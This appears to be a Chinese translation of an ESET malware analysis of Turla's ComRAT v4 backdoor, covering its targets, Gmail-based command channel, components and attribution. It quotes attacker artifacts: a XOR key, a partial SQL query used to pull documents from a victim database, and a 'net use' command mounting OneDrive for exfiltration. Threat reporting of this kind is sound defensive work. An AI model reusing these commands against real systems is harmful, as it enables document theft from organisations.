ESET研究人员发现了Turla组织更新了其一款非常古老的恶意软件家族——ComRAT。ComRAT也叫Agent.BTZ,是一款远程访问木马,自2008年用于美国军方数据泄露后开始闻名。ComRAT的第一个版本发布于2007年,就具有蠕虫般的功能,通过可移除设备来进行传播。2007年到2012年,ComRAT又发布了2个大的更新版本,这2个版本都使用了知名的Turla XOR key:
1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s
2017年中,Turla开发者对ComRAT做了一些修改,但这些变种都是来源于系统的代码基。然后,2017年还发布了一个不同的ComRAT版本,该新版本使用了完全不同的代码基,并且与之前的版本要复杂一些。该恶意软件家族的特征包括:
· ComRAT v4最早发布于2017年,直到2020年1月才被发现。
· 研究人员发现该恶意软件家族的目标主要有:2个外交部和1个国会。
· ComRAT被用来窃取敏感的文档。运营者使用公有云服务来窃取数据,比如OneDrive和4shared。
· ComRAT是用C++语言开发的复杂后门。
· ComRAT 使用Virtual FAT16文件系统。
· ComRAT用现有的访问方法来进行部署,比如PowerStallion PowerShell后门。
· ComRAT有2个命令和控制信道:
· HTTP: 使用于ComRAT v3相同的协议
· Email: 使用Gmail web接口来接收命令和窃取数据
· ComRAT 可以在受害者计算机上执行许多的操作,比如执行其他程序和窃取文件。
与Turla有关
研究人员根据受害者分布和TTP分析,认为ComRAT后门与Turla黑客组织有关。有很多比较明显的线索将ComRAT v4和Turla关联在一起了:
· 使用与之前版本相同的内部名Chinch。
· 使用与ComRAT v3相同的基于HTTP的定制的C2协议。
· 部分网络基础设施与其他的Turla恶意软件家族相同。
· 被其他Turla恶意软件家族释放过或释放过其他恶意软件家族应用:
· 定制的PowerShell加载器
· PowerStallion后门
· RPC后门
攻击者活动分析
ComRAT的主要作用是窃取机密文档。在其中一个例子中,其运营者甚至部署了一个.NET 可执行文件来与受害者的中央MS SQL服务器数据库进行通信,以窃取组织内部文档。使用的SQL命令如下:
sqlCommand.CommandText = "select top " + num2.ToString() + " filename, img, datalength(img), id from with(nolock) where not img is null and id>" + num4.ToString(); sqlCommand.CommandText += " and datalength(img)9))"; sqlCommand.CommandText += " order by id";
图 1. 从中心数据库窃取文档的SQL命令
然后这些窃取的文档会被压缩和发送到云存储服务提供商处,比如OneDrive和4shared。使用下面的命令来挂载云存储:
tracert -h 10 yahoo.com net use https://docs.live.net/E65 /u:@aol.co.uk tracert -h 10 yahoo.com
图 2. 用来挂载OneDrive文件夹的命令
除了窃取文件外,运营者还会运行其他的命令来收集Active Directory组或用户、网络、Windows配置的信息。图3是Turla运营者执行的一些命令:
此外,Turla运营者还会尝试绕过安全软件。比如,定期窃取安全相关的日志来分析恶意软件样本是否会被检测到。这表明该组织的攻击等级的复杂性以及计划长期对设备进行监听。
技术分析
根据编译的时间戳分析,第一个ComRAT v4样本出现于2017年4月。而最近的后门版本编译于2019年11月。
ESET研究人员认为ComRAT是用一些现用的基础来安装的,比如被窃的凭证或其他Turla后门。比如,研究人员就发现过通过PowerStallion安装的ComRAT样本。
ComRAT安装器是一个PowerShell脚本,会创建一个Windows计划任务和在注册表中填充加密的payload。
ComRAT v4有如下组件:
· 用来注入到explorer.exe的orchestrator(协调器),负责控制包括后门命令执行在内的大多数ComRAT函数。
· 由orchestrator注入到默认浏览器中的通信模块——DLL文件,负责使用命名管道与orchestrator通信。
· 一个含有配置和日志文件的虚拟FAT16 文件系统。
图 4是ComRAT架构的示意图:
图 4. ComRAT架构总结
ComRAT v4有2个不同的C2信道:
· HTTP:使用HTTP协议(与之前版本相同);
· Email:使用Gmail web接口。
在email模式中,使用配置中保持的cookies,连接到Gmail web接口来检查收件箱和下载含有加密命令的特定邮件附件。这些命令是恶意软件从其他地址发送的,一般保持在不同的免费邮箱服务器处,比如GMX。
结论
ComRAT v4最早出现于2017年,其最有趣的特征就是使用Gmail web UI来接收命令和窃取数据。因此可以绕过一些安全控制,因为该后门并不依赖于任何恶意域名。此外,该版本恶意软件还放弃了使用COM对象劫持来实现驻留。研究人员分析发现ComRAT v4与Turla黑客组织有关。这也表明Turla黑客组织仍然活跃,而且是外交和军事机构的重大威胁。
更多技术细节参见白皮书:https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf
本文翻译自:https://www.welivesecurity.com/2020/05/26/agentbtz-comratv4-ten-year-journey/如若转载,请注明原文地址